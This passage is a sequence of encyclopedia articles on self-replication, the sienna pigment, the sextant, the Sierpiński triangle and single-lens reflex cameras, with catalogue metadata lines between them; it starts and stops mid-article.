biotechnology and the high levels of funding in that field, attempts to exploit the replicative ability of existing cells are timely, and may easily lead to significant insights and advances. A variation of self replication is of practical relevance in compiler construction, where a similar bootstrapping problem occurs as in natural self replication. A compiler (phenotype) can be applied on the compiler's own source code (genotype) producing the compiler itself. During compiler development, a modified (mutated) source is used to create the next generation of the compiler. This process differs from natural self-replication in that the process is directed by an engineer, not by the subject itself. Mechanical self-replication An activity in the field of robots is the self-replication of machines. Since all robots (at least in modern times) have a fair number of the same features, a self-replicating robot (or possibly a hive of robots) would need to do the following: Obtain construction materials Manufacture new parts including its smallest parts and thinking apparatus Provide a consistent power source Program the new members Error correct any mistakes in the offspring On a nano scale, assemblers might also be designed to self-replicate under their own power. This, in turn, has given rise to the "grey goo" version of Armageddon, as featured in the science fiction novels Bloom and Prey. The Foresight Institute has published guidelines for researchers in mechanical self-replication. The guidelines recommend that researchers use several specific techniques for preventing mechanical replicators from getting out of control, such as using a broadcast architecture. Fields Research has occurred in the following areas: Biology: studies of organismal and cellular natural replication and replicators, and their interaction, including sub-disciplines such as population dynamics, quorum sensing, autophagy pathways. These can be an important guide to avoid design difficulties in self-replicating machinery. Chemistry: self-replication studies are typically about how a specific set of molecules can act together to replicate each other within the set (often part of Systems chemistry field). Biochemistry: simple systems of in vitro ribosomal self replication have been attempted, but as of January 2021, indefinite in vitro ribosomal self replication has not been achieved in the lab. Nanotechnology or more precisely, molecular nanotechnology is concerned with making nano scale assemblers. Without self-replication, capital and assembly costs of molecular machines become impossibly large. Many bottom-up approaches to nanotechnology take advantage of biochemical or chemical self-assembly. Space resources: NASA has sponsored a number of design studies to develop self-replicating mechanisms to mine space resources. Most of these designs include computer-controlled machinery that copies itself. Memetics: The idea of a meme was coined by Richard Dawkins in his 1976 book The Selfish Gene where he proposed a cognitive equivalent of the gene; a unit of behavior which is copied from one host mind to another through observation. Memes can only propagate via animal behavior and are thus analogous to information viruses and are often described as viral. Computer security: Many computer security problems are caused by self-reproducing computer programs that infect computers — computer worms and computer viruses. Parallel computing: loading a new program on every node of a large computer cluster or distributed computing system is time consuming. Using a mobile agents to self-replicate code from node-to-node can save the system administrator a lot of time. Mobile agents have a potential to crash a computer cluster if poorly implemented. In industry Space exploration and manufacturing The goal of self-replication in space systems is to exploit large amounts of matter with a low launch mass. For example, an autotrophic self-replicating machine could cover a moon or planet with solar cells, and beam the power to the Earth using microwaves. Once in place, the same machinery that built itself could also produce raw materials or manufactured objects, including transportation systems to ship the products. Another model of self-replicating machine would copy itself through the galaxy and universe, sending information back. In general, since these systems are autotrophic, they are the most difficult and complex known replicators. They are also thought to be the most hazardous, because they do not require any inputs from human beings in order to reproduce. A classic theoretical study of replicators in space is the 1980 NASA study of autotrophic clanking replicators, edited by Robert Freitas. Much of the design study was concerned with a simple, flexible chemical system for processing lunar regolith, and the differences between the ratio of elements needed by the replicator, and the ratios available in regolith. The limiting element was Chlorine, an essential element to process regolith for Aluminium. Chlorine is very rare in lunar regolith, and a substantially faster rate of reproduction could be assured by importing modest amounts. The reference design specified small computer-controlled electric carts running on rails. Each cart could have a simple hand or a small bull-dozer shovel, forming a basic robot. Power would be provided by a "canopy" of solar cells supported on pillars. The other machinery could run under the canopy. A "casting robot" would use a robotic arm with a few sculpting tools to make plaster molds. Plaster molds are easy to make, and make precise parts with good surface finishes. The robot would then cast most of the parts either from non-conductive molten rock (basalt) or purified metals. An electric oven melted the materials. A speculative, more complex "chip factory" was specified to produce the computer and electronic systems, but the designers also said that it might prove practical to ship the chips from Earth as if they were "vitamins". Molecular manufacturing Nanotechnologists in particular believe that their work will likely fail to reach a state of maturity until human beings design a self-replicating assembler of nanometer dimensions. These systems are substantially simpler than autotrophic systems, because they are provided with purified feedstocks and energy. They do not have to reproduce them. This distinction is at the root of some of the controversy about whether molecular manufacturing is possible or not. Many authorities who find it impossible are clearly citing sources for complex autotrophic self-replicating systems. Many of the authorities who find it possible are clearly citing sources for much simpler self-assembling systems, which have been demonstrated. In the meantime, a Lego-built autonomous robot able to follow a pre-set track and assemble an exact copy of itself, starting from four externally provided components, was demonstrated experimentally in 2003. Merely exploiting the replicative abilities of existing cells is insufficient, because of limitations in the process of protein biosynthesis . What is required is the rational design of an entirely novel replicator with a much wider range of synthesis capabilities. In 2011, New York University scientists have developed artificial structures that can self-replicate, a process that has the potential to yield new types of materials. They have demonstrated that it is possible to replicate not just molecules like cellular DNA or RNA, but discrete structures that could in principle assume many different shapes, have many different functional features, and be associated with many different types of chemical species.
Physical sciences
Science basics
Basics and measurement
29559
https://en.wikipedia.org/wiki/Sienna
Sienna
Sienna (from , meaning "Earth of Siena") is an earth pigment containing iron oxide and manganese oxide. In its natural state, it is yellowish brown, and it is called raw sienna. When heated, it becomes a reddish brown, and it is called burnt sienna. It takes its name from the city-state of Siena, where it was produced during the Renaissance. Along with ochre and umber, it was one of the first pigments to be used by humans, and is found in many cave paintings. Since the Renaissance, it has been one of the brown pigments most widely used by artists. The first recorded use of sienna as a color name in English was in 1760. The normalized color coordinates for sienna are identical to kobe, first recorded as a color name in English in 1924. Earth colors Like the other earth colors, such as yellow ochre and umber, sienna is a clay which is partially composed of iron oxides. In the case of sienna, the most prevalent iron oxides are limonite (which in its natural state has a yellowish color), and goethite. In addition to iron oxides, natural or raw sienna is also composed of manganese oxide, which makes it darker than ochre. Aluminum oxides have also been found in the soil at very low levels. When heated, the limonite and goethite is dehydrated and turns partially to hematite, which gives it a reddish-brown color. Sienna is lighter in shade than raw umber, which is also clay with iron oxide, but which has a significantly higher content of manganese (5 to 20 percent) making it greenish brown or dark brown in color. When heated, raw umber becomes burnt umber, a very dark brown. History The pigment sienna was known and used in its natural form by the ancient Romans. It was mined near Arcidosso (formerly under Sienese control, now in the province of Grosseto) on Monte Amiata in southern Tuscany. It was called terra rossa (red earth), terra gialla (yellow earth), or terra di Siena. In the Middle Ages the sienna pigments were used by artists such as Duccio di Buoninsegna and other painters who lived and worked in and around the Republic of Siena. Duccio was painting with earth pigments in the late 13th century until his death in the early 14th century. During the Renaissance, Giorgio Vasari made note of the pigment under the name terra rossa. Along with umber and yellow ochre, sienna became one of the standard browns used by artists from the 16th to 19th centuries, including Caravaggio (1571–1610) and Rembrandt (1606–1669), who used all three earth colors in his palette. Cross sections of Rembrandt's works, analyzed by X-Ray and infrared lenses, reveal that he used variations of sienna to prime his paintings. This was especially true for some of his later works. Although these artists are known to have used sienna and its variations in their works, scholars have pointed out that the pigment was not commonly referenced by name in European sources until the mid-eighteenth century. By the 1940s, the traditional Italian sources of the pigment were nearly exhausted. Much of today's sienna production is carried out in the Italian islands of Sardinia and Sicily, while other major deposits are found in the Appalachian Mountains, where it is often found alongside the region's iron deposits. It is also still produced in the French Ardennes in the small town of Bonne Fontaine near Ecordal. It is important to note that the chemical composition of the umbers produced in France are distinctly different from the original siennas. In the 20th century, pigments began to be produced using synthetic iron oxide rather than natural deposits. The labels on paint tubes indicate whether they contain natural or synthetic ingredients. PY-43 indicates natural raw sienna, while PR-102 indicates natural burnt sienna. Historical preparation Historically, the pigment was prepared by taking lumps of earth and placing them into a fire either using a crucible or shovel, in order to induce the necessary chemical reaction. In some seventeenth-century accounts, the lumps of earth are supposed to be pulverized, or at least broken down into smaller pieces, first. However, the instructions from the time period are inconsistent. Furthermore, the amount of time that the pigment needs to be heated is based on what the artist preparing the pigment desires. Generally, a longer exposure to heat leads to a deeper red hue. Shades and variations Sienna varies slightly in shade and hue based on the chemical composition of the soil and the temperature and length of time in which it is prepared. A higher composition of iron oxide in the soil leads to a deeper red pigment. There is no single agreed standard for the color of sienna, and the name is used today for a wide variety of hues and shades. They vary by country and color list, and there are many proprietary variations offered by paint companies. The color box at the top of the article shows one variation from the ISCC-NBS color list. Raw sienna Raw sienna is a yellowish-brown natural earth pigment, composed primarily of iron oxide hydroxide. The box shows the color of the pigment in its natural, or raw state. It contains a large quantity of iron oxide and a small quantity (about five percent) of manganese oxide. This kind of pigment is known as yellow ochre, yellow earth, limonite, or terra gialla. The pigment name for natural raw sienna from the Color Index International, shown on the labels of oil paints, is PY-43. This box at right shows a variation of raw sienna from the Italian Ferrario 1919 color list. Burnt sienna Burnt sienna contains a large proportion of anhydrous iron oxide. It is made by heating raw sienna, which dehydrates the iron oxide, changing it partially to hematite, giving it rich reddish-brown color. The pigment is also known as red earth, red ochre, and terra rossa. On the Color Index International, the pigment is known as PR-102. This version is from the Italian Ferrario 1919 color list. The first recorded use of burnt sienna as a color name in English was in 1853. Burnt sienna pigment (Maerz and Paul) This variation of burnt sienna is from the Maerz and Paul "A Dictionary of Color" from 1930. It is considerably lighter than most other versions of burnt sienna. It was a mix of burnt orange and raw sienna. Dark sienna (ISCC-NBS) This infobox shows the color dark sienna. This variation is from the ISCC-NBS color list. A similar dark sienna paint was frequently used on Bob Ross's TV show, The Joy of Painting. Sienna (X11 color) The web color sienna is defined by the list of X11 colors used in web browsers and web design.
Physical sciences
Minerals
Earth science
29588
https://en.wikipedia.org/wiki/Sextant
Sextant
A sextant is a doubly reflecting navigation instrument that measures the angular distance between two visible objects. The primary use of a sextant is to measure the angle between an astronomical object and the horizon for the purposes of celestial navigation. The estimation of this angle, the altitude, is known as sighting or shooting the object, or taking a sight. The angle, and the time when it was measured, can be used to calculate a position line on a nautical or aeronautical chart—for example, sighting the Sun at noon or Polaris at night (in the Northern Hemisphere) to estimate latitude (with sight reduction). Sighting the height of a landmark can give a measure of distance off and, held horizontally, a sextant can measure angles between objects for a position on a chart. A sextant can also be used to measure the lunar distance between the moon and another celestial object (such as a star or planet) in order to determine Greenwich Mean Time and hence longitude. The principle of the instrument was first implemented around 1731 by John Hadley (1682–1744) and Thomas Godfrey (1704–1749), but it was also found later in the unpublished writings of Isaac Newton (1643–1727). In 1922, it was modified for aeronautical navigation by Portuguese navigator and naval officer . Navigational sextants Like the Davis quadrant, the sextant allows celestial objects to be measured relative to the horizon, rather than relative to the instrument. This allows excellent precision. Also, unlike the backstaff, the sextant allows direct observations of stars. This permits the use of the sextant at night when a backstaff is difficult to use. For solar observations, filters allow direct observation of the Sun. Since the measurement is relative to the horizon, the measuring pointer is a beam of light that reaches to the horizon. The measurement is thus limited by the angular accuracy of the instrument and not the sine error of the length of an alidade, as it is in a mariner's astrolabe or similar older instrument. A sextant does not require a completely steady aim, because it measures a relative angle. For example, when a sextant is used on a moving ship, the image of both horizon and celestial object will move around in the field of view. However, the relative position of the two images will remain steady, and as long as the user can determine when the celestial object touches the horizon, the accuracy of the measurement will remain high compared to the magnitude of the movement. The sextant is not dependent upon electricity (unlike many forms of modern navigation) or any human-controlled signals (such as GPS). For these reasons it is considered to be an eminently practical back-up navigation tool for ships. Design The frame of a sextant is in the shape of a sector which is approximately of a circle (60°), hence its name (sextāns, sextantis is the Latin word for "one sixth"). Both smaller and larger instruments are (or were) in use: the octant, quintant (or pentant) and the (doubly reflecting) quadrant span sectors of approximately of a circle (45°), of a circle (72°) and of a circle (90°), respectively. All of these instruments may be termed "sextants". Attached to the frame are the "horizon mirror", an index arm which moves the index mirror, a sighting telescope, Sun shades, a graduated scale and a micrometer drum gauge for accurate measurements. The scale must be graduated so that the marked degree divisions register twice the angle through which the index arm turns. The scales of the octant, sextant, quintant and quadrant are graduated from below zero to 90°, 120°, 140° and 180° respectively. For example, the sextant illustrated has a scale graduated from −10° to 142°, which is basically a quintant: the frame is a sector of a circle subtending an angle of 76° at the pivot of the index arm. The necessity for the doubled scale reading follows from consideration of the relations of the fixed ray (between the mirrors), the object ray (from the sighted object) and the direction of the normal perpendicular to the index mirror. When the index arm moves by an angle, say 20°, the angle between the fixed ray and the normal also increases by 20°. But the angle of incidence equals the angle of reflection so the angle between the object ray and the normal must also increase by 20°. The angle between the fixed ray and the object ray must therefore increase by 40°. This is the case shown in the graphic. There are two types of horizon mirrors on the market today. Both types give good results. Traditional sextants have a half-horizon mirror, which divides the field of view in two. On one side, there is a view of the horizon; on the other side, a view of the celestial object. The advantage of this type is that both the horizon and celestial object are bright and as clear as possible. This is superior at night and in haze, when the horizon and/or a star being sighted can be difficult to see. However, one has to sweep the celestial object to ensure that the lowest limb of the celestial object touches the horizon. Whole-horizon sextants use a half-silvered horizon mirror to provide a full view of the horizon. This makes it easy to see when the bottom limb of a celestial object touches the horizon. Since most sights are of the Sun or Moon, and haze is rare without overcast, the low-light advantages of the half-horizon mirror are rarely important in practice. In both types, larger mirrors give a larger field of view, and thus make it easier to find a celestial object. Modern sextants often have 5 cm or larger mirrors, while 19th-century sextants rarely had a mirror larger than 2.5 cm (one inch). In large part, this is because precision flat mirrors have grown less expensive to manufacture and to silver. An artificial horizon is useful when the horizon is invisible, as occurs in fog, on moonless nights, in a calm, when sighting through a window or on land surrounded by trees or buildings. There are two common designs of artificial horizon. An artificial horizon can consist simply of a pool of water shielded from the wind, allowing the user to measure the distance between the body and its reflection, and divide by two. Another design allows the mounting of a fluid-filled tube with bubble directly to the sextant. Most sextants also have filters for use when viewing the Sun and reducing the effects of haze. The filters usually consist of a series of progressively darker glasses that can be used singly or in combination to reduce haze and the Sun's brightness. However, sextants with adjustable polarizing filters have also been manufactured, where the degree of darkness is adjusted by twisting the frame of the filter. Most sextants mount a 1 or 3-power monocular for viewing. Many users prefer a simple sighting tube, which has a wider, brighter field of view and is easier to use at night. Some navigators mount a light-amplifying monocular to help see the horizon on moonless nights. Others prefer to use a lit artificial horizon. Professional sextants use a click-stop degree measure and a worm adjustment that reads to a minute, 1/60 of a degree. Most sextants also include a vernier on the worm dial that reads to 0.1 minute. Since 1 minute of error is about a nautical mile, the best possible accuracy of celestial navigation is about . At sea, results within several nautical miles, well within visual range, are acceptable. A highly skilled and experienced navigator can determine position to an accuracy of about . A change in temperature can warp the arc, creating inaccuracies. Many navigators purchase weatherproof cases so that their sextant can be placed outside the cabin to come to equilibrium with outside temperatures. The standard frame designs (see illustration) are supposed to equalise differential angular error from temperature changes. The handle is separated from the arc and frame so that body heat does not warp the frame. Sextants for tropical use are often painted white to reflect sunlight and remain relatively cool. High-precision sextants have an invar (a special low-expansion steel) frame and arc. Some scientific sextants have been constructed of quartz or ceramics with even lower expansions. Many commercial sextants use low-expansion brass or aluminium. Brass is lower-expansion than aluminium, but aluminium sextants are lighter and less tiring to use. Some say they are more accurate because one's hand trembles less. Solid brass frame sextants are less susceptible to wobbling in high winds or when the vessel is working in heavy seas, but as noted are substantially heavier. Sextants with aluminum frames and brass arcs have also been manufactured. Essentially, a sextant is intensely personal to each navigator, and they will choose whichever model has the features which suit them best. Aircraft sextants are now out of production, but had special features. Most had artificial horizons to permit taking a sight through a flush overhead window. Some also had mechanical averagers to make hundreds of measurements per sight for compensation of random accelerations in the artificial horizon's fluid. Older aircraft sextants had two visual paths, one standard and the other designed for use in open-cockpit aircraft that let one view from directly over the sextant in one's lap. More modern aircraft sextants were periscopic with only a small projection above the fuselage. With these, the navigator pre-computed their sight and then noted the difference in observed versus predicted height of the body to determine their position. Taking a sight A sight (or measure) of the angle between the Sun, a star, or a planet, and the horizon is done with the 'star telescope' fitted to the sextant using a visible horizon. On a vessel at sea even on misty days a sight may be done from a low height above the water to give a more definite, better horizon. Navigators hold the sextant by its handle in the right hand, avoiding touching the arc with the fingers. For a Sun sight, a filter is used to overcome the glare such as "shades" covering both index mirror and the horizon mirror designed to prevent eye damage. Initially, with the index bar set to zero and the shades covering both mirrors, the sextant is aimed at the sun until it can be viewed on both mirrors through the telescope, then lowered vertically until the portion of the horizon directly below it is viewed on both mirrors. It is necessary to flip back the horizon mirror shade to be able to see the horizon more clearly on it. Releasing the index bar (either by releasing a clamping screw, or on modern instruments, using the quick-release button), and moving it towards higher values of the scale, eventually the image of the Sun will reappear on the index mirror and can be aligned to about the level of the horizon on the horizon mirror. Then the fine adjustment screw on the end of the index bar is turned until the bottom curve (the lower limb) of the Sun just touches the horizon. "Swinging" the sextant about the axis of the telescope ensures that the reading is being taken with the instrument held vertically. The angle of the sight is then read from the scale on the arc, making use of the micrometer or vernier scale provided. The exact time of the sight must also be noted simultaneously, and the height of the eye above sea-level recorded. An alternative method is to estimate the current altitude (angle) of the Sun from navigation tables, then set the index bar to that angle on the arc, apply suitable shades only to the index mirror, and point the instrument directly at the horizon, sweeping it from side to side until a flash of the Sun's rays are seen in the telescope. Fine adjustments are then made as above. This method is less likely to be successful for sighting stars and planets. Star and planet sights are normally taken during nautical twilight at dawn or dusk, while both the heavenly bodies and the sea horizon are visible. There is no need to use shades or to distinguish the lower limb as the body appears as a mere point in the telescope. The Moon can be sighted, but it appears to move very fast, appears to have different sizes at different times, and sometimes only the lower or upper limb can be distinguished due to its phase. After a sight is taken, it is reduced to a position by looking at several mathematical procedures. The simplest sight reduction is to draw the equal-altitude circle of the sighted celestial object on a globe. The intersection of that circle with a dead-reckoning track, or another sighting, gives a more precise location. Sextants can be used very accurately to measure other visible angles, for example between one heavenly body and another and between landmarks ashore. Used horizontally, a sextant can measure the apparent angle between two landmarks such as a lighthouse and a church spire, which can then be used to find the distance off or out to sea (provided the distance between the two landmarks is known). Used vertically, a measurement of the angle between the lantern of a lighthouse of known height and the sea level at its base can also be used for distance off. Adjustment Due to the sensitivity of the instrument it is easy to knock the mirrors out of adjustment. For this reason a sextant should be checked frequently for errors and adjusted accordingly. There are four errors that can be adjusted by the navigator, and they should be removed in the following order. Perpendicularity errorThis is when the index mirror is not perpendicular to the frame of the sextant. To test for this, place the index arm at about 60° on the arc and hold the sextant horizontally with the arc away from you at arm's length and look into the index mirror. The arc of the sextant should appear to continue unbroken into the mirror. If there is an error, then the two views will appear to be broken. Adjust the mirror until the reflection and direct view of the arc appear to be continuous. Side errorThis occurs when the horizon glass/mirror is not perpendicular to the plane of the instrument. To test for this, first zero the index arm then observe a star through the sextant. Then rotate the tangent screw back and forth so that the reflected image passes alternately above and below the direct view. If in changing from one position to another, the reflected image passes directly over the unreflected image, no side error exists. If it passes to one side, side error exists. Alternatively, the user can hold the sextant on its side and observe the horizon to check the sextant during the day. If there are two horizons there is side error. In both cases, adjust the horizon glass/mirror until respectively the star or the horizon dual images merge into one. Side error is generally inconsequential for observations and can be ignored or reduced to a level that is merely inconvenient. Collimation errorThis is when the telescope or monocular is not parallel to the plane of the sextant. To check for this you need to observe two stars 90° or more apart. Bring the two stars into coincidence either to the left or the right of the field of view. Move the sextant slightly so that the stars move to the other side of the field of view. If they separate there is collimation error. As modern sextants rarely use adjustable telescopes, they do not need to be corrected for collimation error. Index errorThis occurs when the index and horizon mirrors are not parallel to each other when the index arm is set to zero. To test for index error, zero the index arm and observe the horizon. If the reflected and direct image of the horizon are in line there is no index error. If one is above the other adjust the index mirror until the two horizons merge. Alternatively, the same procedure can be done at night using a star or the Moon instead of the horizon.
Technology
Navigation
null
29638
https://en.wikipedia.org/wiki/Sierpi%C5%84ski%20triangle
Sierpiński triangle
The Sierpiński triangle, also called the Sierpiński gasket or Sierpiński sieve, is a fractal with the overall shape of an equilateral triangle, subdivided recursively into smaller equilateral triangles. Originally constructed as a curve, this is one of the basic examples of self-similar sets—that is, it is a mathematically generated pattern reproducible at any magnification or reduction. It is named after the Polish mathematician Wacław Sierpiński but appeared as a decorative pattern many centuries before the work of Sierpiński. Constructions There are many different ways of constructing the Sierpiński triangle. Removing triangles The Sierpiński triangle may be constructed from an equilateral triangle by repeated removal of triangular subsets: Start with an equilateral triangle. Subdivide it into four smaller congruent equilateral triangles and remove the central triangle. Repeat step 2 with each of the remaining smaller triangles infinitely. Each removed triangle (a trema) is topologically an open set. This process of recursively removing triangles is an example of a finite subdivision rule. Shrinking and duplication The same sequence of shapes, converging to the Sierpiński triangle, can alternatively be generated by the following steps: Start with any triangle in a plane (any closed, bounded region in the plane will actually work). The canonical Sierpiński triangle uses an equilateral triangle with a base parallel to the horizontal axis (first image). Shrink the triangle to height and width, make three copies, and position the three shrunken triangles so that each triangle touches the two other triangles at a corner (image 2). Note the emergence of the central hole—because the three shrunken triangles can between them cover only of the area of the original. (Holes are an important feature of Sierpiński's triangle.) Repeat step 2 with each of the smaller triangles (image 3 and so on). This infinite process is not dependent upon the starting shape being a triangle—it is just clearer that way. The first few steps starting, for example, from a square also tend towards a Sierpiński triangle. Michael Barnsley used an image of a fish to illustrate this in his paper "V-variable fractals and superfractals." The actual fractal is what would be obtained after an infinite number of iterations. More formally, one describes it in terms of functions on closed sets of points. If we let dA denote the dilation by a factor of about a point A, then the Sierpiński triangle with corners A, B, and C is the fixed set of the transformation . This is an attractive fixed set, so that when the operation is applied to any other set repeatedly, the images converge on the Sierpiński triangle. This is what is happening with the triangle above, but any other set would suffice. Chaos game If one takes a point and applies each of the transformations dA, dB, and dC to it randomly, the resulting points will be dense in the Sierpiński triangle, so the following algorithm will again generate arbitrarily close approximations to it: Start by labeling p1, p2 and p3 as the corners of the Sierpiński triangle, and a random point v1. Set , where rn is a random number 1, 2 or 3. Draw the points v1 to v∞. If the first point v1 was a point on the Sierpiński triangle, then all the points vn lie on the Sierpiński triangle. If the first point v1 to lie within the perimeter of the triangle is not a point on the Sierpiński triangle, none of the points vn will lie on the Sierpiński triangle, however they will converge on the triangle. If v1 is outside the triangle, the only way vn will land on the actual triangle, is if vn is on what would be part of the triangle, if the triangle was infinitely large. Or more simply: Take three points in a plane to form a triangle. Randomly select any point inside the triangle and consider that your current position. Randomly select any one of the three vertex points. Move half the distance from your current position to the selected vertex. Plot the current position. Repeat from step 3. This method is also called the chaos game, and is an example of an iterated function system. You can start from any point outside or inside the triangle, and it would eventually form the Sierpiński Gasket with a few leftover points (if the starting point lies on the outline of the triangle, there are no leftover points). With pencil and paper, a brief outline is formed after placing approximately one hundred points, and detail begins to appear after a few hundred. Arrowhead construction of Sierpiński gasket Another construction for the Sierpiński gasket shows that it can be constructed as a curve in the plane. It is formed by a process of repeated modification of simpler curves, analogous to the construction of the Koch snowflake: Start with a single line segment in the plane Repeatedly replace each line segment of the curve with three shorter segments, forming 120° angles at each junction between two consecutive segments, with the first and last segments of the curve either parallel to the original line segment or forming a 60° angle with it. At every iteration, this construction gives a continuous curve. In the limit, these approach a curve that traces out the Sierpiński triangle by a single continuous directed (infinitely wiggly) path, which is called the Sierpiński arrowhead. In fact, the aim of Sierpiński's original article in 1915 was to show an example of a curve (a Cantorian curve), as the title of the article itself declares. Cellular automata The Sierpiński triangle also appears in certain cellular automata (such as Rule 90), including those relating to Conway's Game of Life. For instance, the Life-like cellular automaton B1/S12 when applied to a single cell will generate four approximations of the Sierpiński triangle. A very long, one cell–thick line in standard life will create two mirrored Sierpiński triangles. The time-space diagram of a replicator pattern in a cellular automaton also often resembles a Sierpiński triangle, such as that of the common replicator in HighLife. The Sierpiński triangle can also be found in the Ulam-Warburton automaton and the Hex-Ulam-Warburton automaton. Pascal's triangle If one takes Pascal's triangle with rows and colors the even numbers white, and the odd numbers black, the result is an approximation to the Sierpiński triangle. More precisely, the limit as approaches infinity of this parity-colored -row Pascal triangle is the Sierpiński triangle. As the proportion of black numbers tends to zero with increasing n, a corollary is that the proportion of odd binomial coefficients tends to zero as n tends to infinity. Towers of Hanoi The Towers of Hanoi puzzle involves moving disks of different sizes between three pegs, maintaining the property that no disk is ever placed on top of a smaller disk. The states of an -disk puzzle, and the allowable moves from one state to another, form an undirected graph, the Hanoi graph, that can be represented geometrically as the intersection graph of the set of triangles remaining after the th step in the construction of the Sierpiński triangle. Thus, in the limit as goes to infinity, this sequence of graphs can be interpreted as a discrete analogue of the Sierpiński triangle. Properties For integer number of dimensions , when doubling a side of an object, copies of it are created, i.e. 2 copies for 1-dimensional object, 4 copies for 2-dimensional object and 8 copies for 3-dimensional object. For the Sierpiński triangle, doubling its side creates 3 copies of itself. Thus the Sierpiński triangle has Hausdorff dimension , which follows from solving for . The area of a Sierpiński triangle is zero (in Lebesgue measure). The area remaining after each iteration is of the area from the previous iteration, and an infinite number of iterations results in an area approaching zero. The points of a Sierpiński triangle have a simple characterization in barycentric coordinates. If a point has barycentric coordinates , expressed as binary numerals, then the point is in Sierpiński's triangle if and only if for Generalization to other moduli A generalization of the Sierpiński triangle can also be generated using Pascal's triangle if a different modulus is used. Iteration can be generated by taking a Pascal's triangle with rows and coloring numbers by their value modulo . As approaches infinity, a fractal is generated. The same fractal can be achieved by dividing a triangle into a tessellation of similar triangles and removing the triangles that are upside-down from the original, then iterating this step with each smaller triangle. Conversely, the fractal can also be generated by beginning with a triangle and duplicating it and arranging of the new figures in the same orientation into a larger similar triangle with the vertices of the previous figures touching, then iterating that step. Analogues in higher dimensions The Sierpiński tetrahedron or tetrix is the three-dimensional analogue of the Sierpiński triangle, formed by repeatedly shrinking a regular tetrahedron to one half its original height, putting together four copies of this tetrahedron with corners touching, and then repeating the process. A tetrix constructed from an initial tetrahedron of side-length has the property that the total surface area remains constant with each iteration. The initial surface area of the (iteration-0) tetrahedron of side-length is . The next iteration consists of four copies with side length , so the total area is again. Subsequent iterations again quadruple the number of copies and halve the side length, preserving the overall area. Meanwhile, the volume of the construction is halved at every step and therefore approaches zero. The limit of this process has neither volume nor surface but, like the Sierpiński gasket, is an intricately connected curve. Its Hausdorff dimension is ; here "log" denotes the natural logarithm, the numerator is the logarithm of the number of copies of the shape formed from each copy of the previous iteration, and the denominator is the logarithm of the factor by which these copies are scaled down from the previous iteration. If all points are projected onto a plane that is parallel to two of the outer edges, they exactly fill a square of side length without overlap. History Wacław Sierpiński described the Sierpiński triangle in 1915. However, similar patterns appear already as a common motif of 13th-century Cosmatesque inlay stonework. The Apollonian gasket, named for Apollonius of Perga (3rd century BC), was first described by Gottfried Leibniz (17th century) and is a curved precursor of the 20th-century Sierpiński triangle. Etymology The usage of the word "gasket" to refer to the Sierpiński triangle refers to gaskets such as are found in motors, and which sometimes feature a series of holes of decreasing size, similar to the fractal; this usage was coined by Benoit Mandelbrot, who thought the fractal looked similar to "the part that prevents leaks in motors".
Mathematics
Other
null
29648
https://en.wikipedia.org/wiki/Single-lens%20reflex%20camera
Single-lens reflex camera
A single-lens reflex camera (SLR) is a camera that typically uses a mirror and prism system (hence "reflex" from the mirror's reflection) that permits the photographer to view through the lens and see exactly what will be captured. With twin lens reflex and rangefinder cameras, the viewed image could be significantly different from the final image. When the shutter button is pressed on most SLRs, the mirror flips out of the light path, allowing light to pass through to the light receptor and the image to be captured. History Until the development of SLR, all cameras with viewfinders had two optical light paths: one through the lens to the film, and another positioned above (TLR or twin-lens reflex) or to the side (rangefinder). Because the viewfinder and the film lens cannot share the same optical path, the viewing lens is aimed to intersect with the film lens at a fixed point somewhere in front of the camera. This is not problematic for pictures taken at a middle or longer distance, but parallax causes framing errors in close-up shots. Moreover, it is not easy to focus the lens of a fast reflex camera when it is opened to wider apertures (such as in low light or while using low-speed film). Most SLR cameras permit upright and laterally correct viewing through use of a roof pentaprism situated in the optical path between the reflex mirror and viewfinder. Light, which comes both horizontally and vertically inverted after passing through the lens, is reflected upwards by the reflex mirror, into the pentaprism where it is reflected twice to correct the inversions caused by the lens, and align the image with the viewfinder. When the shutter is released, the mirror moves out of the light path, and the light shines directly onto the film (or in the case of a DSLR, the CCD or CMOS imaging sensor). Exceptions to the moving mirror system include the Canon Pellix and Sony SLT cameras, along with several special-purpose high-speed cameras (such as the Canon EOS-1N RS), whose mirror was a fixed beamsplitting pellicle. Focus can be adjusted manually by the photographer or automatically by an autofocus system. The viewfinder can include a matte focusing screen located just above the mirror system to diffuse the light. This permits accurate viewing, composing and focusing, especially useful with interchangeable lenses. Up until the 1990s, SLR was the most advanced photographic preview system available, but the recent development and refinement of digital imaging technology with an on-camera live LCD preview screen has overshadowed SLR's popularity. Nearly all inexpensive compact digital cameras now include an LCD preview screen allowing the photographer to see what the CCD is capturing. However, SLR is still popular in high-end and professional cameras because they are system cameras with interchangeable parts, allowing customization. They also have far less shutter lag, allowing photographs to be timed more precisely. Also the pixel resolution, contrast ratio, refresh rate, and color gamut of an LCD preview screen cannot compete with the clarity and shadow detail of a direct-viewed optical SLR viewfinder. Large format SLR cameras were probably first marketed with the introduction of C.R. Smith's Monocular Duplex (U.S., 1884). SLRs for smaller exposure formats were launched in the 1920s by several camera makers. The first 35 mm SLR available to the mass market, Leica's PLOOT reflex housing along with a 200 mm f4.5 lens paired to a 35 mm rangefinder camera body, debuted in 1935. The Soviet Спорт (“Sport”), also a 24 mm by 36 mm image size, was prototyped in 1934 and went to market in 1937. K. Nüchterlein's Kine Exakta (Germany, 1936) was the first integrated 35 mm SLR to enter the market. Additional Exakta models, all with waist-level finders, were produced up to and during World War II. Another ancestor of the modern SLR camera was the Swiss-made Alpa, which was innovative, and influenced the later Japanese cameras. The first eye-level SLR viewfinder was patented in Hungary on August 23, 1943, by Jenő Dulovits, who then designed the first 35 mm camera with one, the Duflex, which used a system of mirrors to provide a laterally correct, upright image in the eye-level viewfinder. The Duflex, which went into serial production in 1948, was also the world's first SLR with an instant-return (a.k.a. autoreturn) mirror. The first commercially produced SLR that employed a roof pentaprism was the Italian Rectaflex A.1000, shown in full working condition on Milan fair April 1948 and produced from September the same year, thus being on the market one year before the east German Zeiss Ikon VEB Contax S, announced on May 20, 1949, produced from September. The Japanese adopted and further developed the SLR. In 1952, Asahi developed the Asahiflex and in 1954, the Asahiflex IIB. In 1957, the Asahi Pentax combined the fixed pentaprism and the right-hand thumb wind lever. Nikon, Canon and Yashica introduced their first SLRs in 1959 (the F, Canonflex, and Pentamatic, respectively). Digital SLRs Canon, Nikon and Pentax have all developed digital SLR cameras (DSLRs) using the same lens mounts as on their respective film SLR cameras. Konica Minolta did the same, and after having bought Konica Minolta's camera division in 2006. Sony continues using the Minolta AF lens mount in their DSLRs, including cameras built around a semi-transparent fixed mirror. Samsung builds DSLRs based on the Pentax lens mount. Olympus, on the other hand, chose to create a new digital-only Four Thirds System SLR standard, adopted 